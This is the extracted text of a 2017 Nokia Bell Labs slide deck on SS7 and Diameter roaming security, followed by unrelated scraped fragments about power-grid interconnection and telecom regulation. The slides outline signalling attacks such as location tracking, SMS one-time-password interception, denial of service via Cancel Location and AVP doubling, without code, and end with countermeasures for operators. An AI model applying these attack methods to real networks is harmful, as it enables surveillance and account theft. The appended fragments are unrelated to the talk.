Interconnection Security - SS7 And Diameter - Cdn2-ecros.pl
Bell LabsInterconnection Security SS7 and DiameterSilke HoltmannsNokia Bell Labs14th November 20171 Change information classification in footer Nokia 2016Bell Labs
Bell LabsIndustrial Research2 Change information classification in footer Nokia 2016Bell Labs
Bell Lab research for signallingNokia Bell LabsResearch for technology and communication since 1925Bell Labs3
Nokia Bell Labs – Future Attacks and MitigationResearch that solves real problems together with our customersBell Labs Research Lifecycle Theoretical studies go into attack andcountermeasure design Validation and awareness of our research byGSMA standards input and publicationLabProblem study /Threats/AttackDesignAttackTesting Customer feedback and test results allowus to fine-tune and optimize ourcountermeasures Research input will fit product needs andoperators requests Operator needs can be discovered ”live” fornew research challenges and disruptive ntermeasuresValidation andAwarenessBell Labs4
Routing and Signalling Security Research in Nokia Bell LabsSilke Holtmanns, Yoan Miche, Ian OliverCatching what hasnot been caughtTelecommunicationprotocol securityFinding and mitigating signalingvulnerabilitiesTelco protocols meet HackersTwo worlds move towards each other5G Security RequestsAwareness and education on diameter security(own company, customers, legislators)Attacks evolve, so must weBell Labs5
Bell LabsSignalling System No 7SS7 Security6 Change information classification in footer Nokia 2016Bell Labs
What is roaming?We are here, somewhereMEO, Vodafone, NOSMeeting AttendeesTelefonica, DT, Vodafone, MTS,.My home mobile network operatorColleagues & FamilyElisa, TeliaSonera, DNABell Labs7
Roaming Network – Interconnection NetworkNot the Internet – but equally importantBell Labs8
We are all connected to the Interconnection NetworkBell Labs9
History of Interconnection NetworkTo understand the problem Established more than 35 years ago between a few state ownedoperators Build on trust (closed private network) No inbuilt security (in particular, no source authentication) SS7 protocol was constantly extended for new services andfeatures New service providers connect all the time e.g. IPX roaminghubs, Application to user SMS, etc Now moving towards LTE / Diameter based protocols (4G/5G)Bell Labs10
Closed & Private Network?Bell Labs11 Change information classification in footer Nokia 2016
How the attackers get in?Renting a ServiceHackingHaving PowerBribing an EmployeeBecome an OperatorConvincingBell Labs12
Existing Attacks for the ”old” SS7If no protection is deployed Location TrackingEavesdroppingFraudDenial of Service user & networkCredential theftData session hijackingUnblocking stolen phoneSMS interceptionOne time password theft and accounttakeover for banks, Telegram, Facebook,Whatsapp, g-mail (bitcoin)Bell Labs13
Current Status of IPX Security Most commonly used protocol for interconnection is stillSS7-MAP (message application part) Often intermediate nodes involved Often without any form of transport security- No IPSec, no TLS / DTLS, no MAPSec No source authentication, no integrity, no confidentialityBell Labs14
Bell LabsDiameter Security15 Change information classification in footer Nokia 2016Bell Labs
All will be better with LTE and Diameter Bell Labs16
All will be better different withLTE and Diameter Bell Labs17
Attacks are realityWhy should they stop? Because we have LTE?18 Intelligence communities see mobilenetworks as “all-you-can-eat-databuffet” and a way for VIP tracking andeavesdropping Dark Service companies useInterconnection to make money (fraud,SMS interception, location trackingofferings) Military uses mobile network data fortarget localization Nokia Solutions and Networks 2014
Service companies move with time and technology19 Nokia Solutions and Networks 2014
Two LTE Networks ConnectConnection via IPX providerBell Labs20
A bit more realistic .IPX “tiny” exampleBell Labs21 Change information classification in footer Nokia 2016
Known Diameter Attacks Location Tracking (NATO CyCon Conference, 2015) Downgrading attacks (Troopers TelcoSec 2016) Denial of Service & Fraud (Blackhat, 2016) SMS and one time password interception (IEEE ICC 2017) Subscriber Profile Modification (Network and System Security 2017)To come Data interception for GPRS, LTE (potentially December 2017)Bell Labs22
Network Attack - DoSNetwork Setup for DoS Testing – VideoBell Labs23
Get the IMSI using SRR Send Routing Info for SMRequest (SRR) Sent by SMSC to the HSS Retrieves subscriber’sIMSI and identity of theserving MME Routing a shortmessage to therecipientBell Labs24
Denial of Service using CLRCancel Location Request (CLR)Sent by HSS to the MME to detachthe UE MME change (location change)Subscription WithdrawalBell Labs25
IDR usage for Location TrackingBell Labs26 Change information classification in footer Nokia 2016
One Time Password Interception using SMSLTE Diameter basedBell Labs27
Services that use SMS password recoveryBell Labs28 Change information classification in footer Nokia 2016
Diameter Security – Old tricks come again (implementation specific)Diameter message manipulation - Attribute Value Pair (AVP) doubling.HSSDEADiameterOrig MME.operator.comDest HSS.operatora.comHop-by-hop ID 3AVP:Value1Value2AttackerDiameterOrig MME.operator.comDest HSS.operatora.comHop-by-hop ID 1AVP:Value1Value2Operator Network AFast decision based on value 1ignoring value 2Thorough decision, iterating allvalues, taking value 2Diameter messages can be manipulated tocontain multiple AVPs of the same kind(same AVP id) even though the specificationclearly says it's illegal to do so.Bell Labs29
Bell LabsIoT & Interconnection30 Change information classification in footer Nokia 2016Bell Labs
Who are IoT B2B customers?Public SectorEnergyTransportationLarge Enterprises Public Safety Utilities Defense GovernmentBroadband SmartCities/SmartGovernment Electricity Oil, Gas & Mining Utility Broadband Railways Highways Logistics Aviation/Airports Maritime Financial Healthcare Automotive Retail31 Nokia Solutions and Networks 201499.9
There might be many roaming IoT devicesRoaming IoT devicesCountry A Even meters, buiding sensors etc mayroam (coverage reasons). In particularfor global operators. Normal roaming e.g. cars, logistics etc Broker SIMs (e.g. Apple iSIM)NO DirectAccess !Meter with Country B USIM on eUICCOperabor belongto Operator GroupConnect as roamer Ease of production New business models e.g. globalcompany wanting to have a”harmonized” infrastructure andbeing supplied by one connectivitysupplier Large amounts of same device typesbehaving in the consistent same322014manner Nokia Solutions and NetworksGSMA Member ConfidentialVPNOther country A operatorIPX networkCountry BOperabor belongto Operator Group
”Classical” Interconnection RisksAffecting also IoT devices Location Tracking Fraud Credential Theft SMS Attacks- Interception- Spoofing (steering messages / reporting messages) GTP data attacks- Session hijacking- Cryptographic key theft (potentially used on air interface)33 Nokia Solutions and Networks 2014GSMA Member Confidential
3GPP Release 14 – IoT ExtensionsTS 23.682 Trust model for new interfaces is the same as for the existing ones– 3GPP TS 33.210 to be used for connecting to partners Easy interworking and access for machine service providers Non-MSISDN based devices– External identifier (DNS resolvable) New nodes and interworking functions to allow seamless integrationinto existing networks34 2016 NokiaGSMA Member Confidential
3GPP TS 23.682 - ProtocolsFigure 4.2-1b: 3GPP Architecture for Machine-Type Communication (Roaming)IP-SM-GWSMS-SC/GMSC/IWMSCET4SG dSMS protocolsTsmsSMECDF/CGF(SMS using DiameterMTCAAAHSSmaybe MAP/IP fallbaS6nGdRf/GaDiameterS6mMTC-IWFTspControl planeUse r pla neS6tSCEFT7AP IServi cesCapa bilityServer(SCS)1Applica tionServer(AS)2Gi/SG iGGSN/P-GWGi/SG iHPLMNVPL MNIWKSCEFT6biMSCSG sT6aiMMEMTC UEApplicationRANUESGSNS-GWUm /Uu /LTE-Uu35 2016 NokiaGSMA Member ConfidentialGTPApplica tionServer(AS)Indirect Mode l1Direct Model2Hyb rid Mo del1 2
IoT and Interconnection - Summary New IoT interfaces bring new risks- Some risks similar to existing risks, but could be ”larger in scale”- Trust model need to be carefully studied when opening up new interfaces- Business models (i.e.coverage) may suddenly open up interfaces that were not designed forinterconnection i.e. extra protection needed New Security Approaches for IoT Roaming- Understanding and profiling of groups of devices- Roaming specific aspecs for groups of IoT devices need to taken into account at network edge- Specific IoT group filtering capabilities needed in long run Today:- One subscription is roughly like another from security point of view (exception pre-paid)36 Nokia Solutions and Networks 2014 Change information classification in footer
Bell LabsCountermeasures37 Change information classification in footer Nokia 2016Bell Labs
Let’s use IPSecGood idea, but . IPSec for diameter is standardized It’s all IP, lets use IPSec! Maybe not that easy Not all is IP (some part of SS7 / interworking)Who will host / create root certificatesOperators in developing countriesInterconnection service provider - only hop-by-hop securityNodes difficult to upgrade Still no protection against Partners renting out to ”service companies”Hacked nodesBribed employeesGovernmental tiesBell Labs38
Countermeasures for operatorsDetectMitigateMonitor network trafficPenetration & re-testingTenant monitoringFilter, filter, filterSignaling FirewallSMS Home RoutingCooperatePrepareShare experiences (GSMA)IPSec with partners e.g. EUCooperation with legislatorsFollow FS.11,FS.19,FS.07Find weak spotsNode hardening/proceduresBell Labs39
Bell LabsSummary40 Change information classification in footer Nokia 2016Bell Labs
Summary Interconnection attacks are reality, but current main focus is SS7- attackers move also with technology LTE/Diameter has similar functionality- hence similar attacks are possible there Security is not part of operator core business model- impacts and risks too large to ignore Independent of phone, platform or device Will LTE face the similar Interconnection weaknesses as SS7?- If networks don’t take protection measures, then yes.Bell Labs41
Bell LabsQuestions?Silke.Holtmanns@nokia.com42 Change information classification in footer Nokia 2016Bell Labs
Research for technology and communication since 1925. 4 Bell Labs Theoretical studies go into attack and countermeasure design Validation and awareness of our research by GSMA standards input and publication Customer feedbac
system. SS7 is a separate network whose duties are setting up, tearing down, monitoring, and routing calls on the PSTN. SS7 is akin to TCP/IP in that it operates at several layers of the OSI model. And, like TCP/IP, SS7 is packet-based. It is a software-based system that operate
I am excited to reveal that my quarterly interconnection update has transformed into the Interconnection Quarterly, a hand-tailored, independent briefing on the interconnection industry. Right now, my plans are to publish the Interconnection Quarterly shortly after the last public companies report earnings, as I've done with the previous updates.
2 Outline ¾Background: Distributed Energy Resources (DER or DR) ¾Introduction: Standards & Technology Development. ¾IEEE SCC21: Standards Coordinating Committee 21 ¾IEEE 1547 Series of Interconnection Stds-ANSI/IEEE Std 1547 (2003): interconnection system & interconnection test requirements for interconnecting DR with Electric Power Systems (EPS) -P1547.1 standard for interconnection test .
SS7 exploits can turn a cell phone into an open book, allowing an attacker to read messages, track a subscriber’s location, and eavesdrop on and redirect calls. This technique is now avail-able not only to intelligence services, but to an average hacker as well. In 2014, we described in detail security issues in signaling networks[1].
Telecommunications Regulation Handbook 119 CHAPTER 5. FROM CAPACITY TO CONNECTIVITY: NETWORK ACCESS AND INTERCONNECTION 5.1. Introduction Chapter 5 focuses on network access and interconnection as a basis for expanding connectivity. It explains why network access and interconnection are important and why they need to be regulated.
Association to determine whether the proposed interconnection is subject to these Procedures. The Association shall respond to such informal request within fifteen (15) Business Days. 4. As a condition of interconnection with the Association’s System, each Interconnection
Apr 07, 2017 · Grid Interconnections 2 Typical Interconnection Projects * . Interconnection Tariffs . Interconnection Processes . Frequently Asked Questions (FAQs) The purpose of
2021 Interconnection Process Enhancements Draft Final Proposal ISO/Grid Assets/I&OP Page 5 interconnection queue.6 The 605 projects totaling 236,225 MW, 164,153 net MW at the Point of Interconnection (POI), currently in the queue exceeds mid-term requirements
